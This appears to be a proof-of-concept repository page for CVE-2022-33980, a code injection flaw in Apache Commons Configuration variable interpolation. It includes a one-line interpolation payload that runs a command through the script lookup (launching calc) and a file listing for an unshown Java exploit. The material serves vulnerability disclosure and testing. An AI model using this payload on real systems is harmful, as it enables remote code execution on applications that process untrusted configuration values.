CVE-2022-33980 PoC — Apache Commons Configuration Code Injection Vulnerability

Associated Vulnerability
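Title: Apache Commons Configuration Code Injection Vulnerability (CVE-2022-33980)
Description: Apache Commons Configuration is a generic configuration interface from the Apache Software Foundation (USA), mainly used to let Java applications read configuration data from a variety of sources. Apache Commons Configuration versions 2.4 through 2.7 contain a code injection vulnerability. It stems from the variable interpolation that Apache Commons Configuration performs, which allows properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate the instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation.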
Description
POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)
Readme
# CVE-2022-33980

`${script:js:java.lang.Runtime.getRuntime().exec("calc")}`  
File Snapshot

[4.0K] /data/pocs/5a1c2ce545549a54c2ec04880d7ed88993ce345d
├── [3.2K] pom.xml
├── [ 79] README.md
└── [4.0K] src
    └── [4.0K] main
        └── [4.0K] java
            └── [ 976] CVE_2022_33980.java

3 directories, 3 files